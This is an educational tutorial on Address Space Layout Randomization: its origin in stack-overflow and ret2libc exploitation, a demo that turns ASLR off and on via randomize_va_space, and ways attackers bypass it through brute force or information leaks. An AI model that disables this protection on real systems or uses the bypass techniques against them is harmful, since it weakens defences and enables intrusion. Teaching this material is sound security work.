Address Space Layout Randomization (ASLR)
A history lesson
Before we describe what ASLR is or how it's used to prevent exploitation, we need to understand why it was created.
In 1996, a hacker by the name of Aleph One published an article in
Phrack Magazine titled, "Smashing the Stack for Fun and Profit". In this
article, Aleph One describes, in great detail, how buffer overflow
vulnerabilities can be exploited to gain arbitrary code execution. These
exploitation techniques utilized a stack buffer overflow to overwrite the saved
return pointer of a function with a stack address. When the vulnerable function
executes its final ret
instruction, the process jumps into the stack and
begins to execute whatever data is residing at the provided location in the
stack - the data being the attacker's shellcode. [1]
The hacker, Solar Designer, took this a step further by introducting the
ret2libc
technique. ret2libc
leverages a stack buffer overflow to gain
control of a function's saved return address, however, instead of ret
urning
into the stack, the process ret
urns into libc
's system()
symbol. The
attacker crafts the stack frame so that system()
interprets the string
'/bin/sh'
as its first argument, hijacking the process to call
system('/bin/sh')
. [2]
In order to thwart these stack buffer overflow exploitation techniques, the
PaX Team released PaX, a patch for the Linux kernel that implements the
W^X
protection for memory pages and ASLR. [3] In a future
section we'll cover the concept of W^X
and the non-executable stack.
So what is ASLR?
"The goal of Address Space Layout Randomization is to introduce randomness into addresses used by a given task. This will make a class of exploit techniques fail with a quantifiable probability and also allow their detection since failed attempts will most likely crash the attacked task." - The PaX Team [4]
The exploit techniques of the past relied upon the memory image of the process
being exploited to be the same for each exploit, with minor differences due
to changes in the environment. Attackers could expect that the libc
system()
symbol and a '/bin/sh'
string would be at static locations within
memory for each exploit. ASLR randomizes the base addresses of the heap, shared
objects, and the stack when these segments are mapped into process memory,
attempting to introduce enough entropy to prevent an attacker from successfully
brute forcing their locations. Without knowledge of the base address of libc
within a target's memory, attackers conducting the ret2libc
exploit
technique have to guess the system()
symbol address and the '/bin/sh'
string's address.
ASLR in action
To see ASLR for yourself, first let's turn it off. This technique works on Ubuntu 18.04 - if it doesn't seem to work for you, try looking up how your operating system implements ASLR and how you can enable/disable it. To turn off ASLR globally for all processes, execute the following command:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Now, lets see how this affects the mappings of our processes. Run strace
on
/bin/ls
and notice the results of the mmap()
calls being made to setup
the process's memory mappings. Each call to mmap()
ends up with the same
address each time, right? Let's re-enable ASLR on your operating system:
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
Now, run strace
on /bin/ls
a couple times. You should see that the
results of the mmap()
calls are no longer the same each time /bin/ls
is
invoked. The memory map of our /bin/ls
process is being randomized each time
we execute it.
Breaking ASLR
Is it possible to brute force?
Well, it depends. In
this paper researchers
demonstrated that, with enough tries on the same memory mapping, attackers
could brute force the delta_mmap
value described in [4].
Symbols in libc
have static offsets, we can find these by using objdump
. If
we know the usual base address of libc
within process memory, we can compute
the address of our target symbol and then account for the entropy introduced by
ASLR. A condition that enabled the researchers to continuously brute force a
target to determine its delta_mmap
value is that the parent process executed
fork()
each time a connection was made. When a process fork()
s, the child
process's memory mapping will be identical to the parent's. The researchers
could crash the child process as many times as necessary to discover the
delta_mmap
value. Once they discovered the delta_mmap
value, the
researchers computed the base address of libc
within the target's memory,
allowing them to compute the location of any symbol in the target's libc
to
build the final payload.
Other methods?
Another interesting thing to think about is the amount of entropy introduced by
a system's implementation of ASLR. If the number of bits randomized within the
virtual address space of a process is small enough, even if the process doesn't
fork()
like in the example above and the mapping is different on each
invocation, we could still feasibly brute force the location of libc
symbols
in memory with enough guesses.
A common method of beating ASLR is through utilizing some sort of sensitive
information leak, like a format string vulnerability. [6] If an
attacker can leak information from the process to discover the location of a
libc
symbol in the process's memory, the attacker can calculate the base
of libc
within the process's memory, beating ASLR. [7]